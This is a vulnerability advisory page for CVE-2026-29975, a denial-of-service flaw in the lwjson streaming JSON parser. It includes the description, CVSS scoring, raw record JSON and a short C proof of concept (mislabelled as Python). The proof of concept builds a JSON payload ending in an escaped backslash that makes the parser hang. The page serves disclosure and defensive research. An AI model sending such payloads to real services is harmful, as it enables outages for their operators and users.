Security Vulnerability Report
中文
CVE-2026-29975 CVSS 7.5 HIGH

CVE-2026-29975

Published: 2026-05-08 16:16:10
Last Modified: 2026-05-12 14:51:22
Source: [email protected]

Description

lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like "\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

lwjson 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-29975 * This payload demonstrates the JSON structure that causes the hang. * A string ending with an escaped backslash (\\) causes the parser to fail termination. */ #include <stdio.h> #include <string.h> // Hypothetical usage context void trigger_vulnerability() { // Malicious JSON payload: key's value ends with \\ // In JSON string literal: {"test":"value\\"} // Actual bytes: {"test":"value\\"} char* malicious_json = "{\"test\":\"value\\\\\"}"; printf("Sending payload: %s\n", malicious_json); // If processed by vulnerable lwjson_stream_parse(): // The parser sees the final quote, looks back, sees a backslash. // It thinks the quote is escaped, but the backslash was actually escaping itself. // Result: Infinite loop / Hang. // lwjson_stream_parse(parser, malicious_json, strlen(malicious_json)); } int main() { trigger_vulnerability(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29975", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:10.213", "lastModified": "2026-05-12T14:51:21.830", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like \"\\\\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "references": [{"url": "https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103", "source": "[email protected]"}, {"url": "https://github.com/MaJerle/lwjson/blob/develop/lwjson/src/lwjson/lwjson_stream.c#L362-L364", "source": "[email protected]"}, {"url": "https://github.com/MaJerle/lwjson/tree/develop", "source": "[email protected]"}, {"url": "https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.